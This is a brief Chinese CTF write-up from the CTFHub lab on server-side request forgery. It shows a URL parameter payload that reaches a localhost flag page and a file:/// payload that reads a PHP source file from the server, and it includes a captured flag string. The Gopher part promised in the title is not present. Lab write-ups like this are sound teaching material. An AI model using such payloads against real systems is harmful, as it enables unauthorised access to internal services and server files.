协议读取文件Gopher协议的利用"/>
SSRF(3)伪协议读取文件Gopher协议的利用
一:Http、Dict和file等协议的利用
1,内网访问
所以构造:
/?url=http://127.0.0.1/flag.php
得到:
ctfhub{ce475b59a4baee959112777b}
2,伪协议读取文件
最经典的PHP伪协议就是file:///协议了,可以用来读取php源码
构造payload:
/?url=file:///var/www/html/flag.php
得到:
在单击右键查看源代码:
更多推荐
SSRF(3)伪协议读取文件Gopher协议的利用
发布评论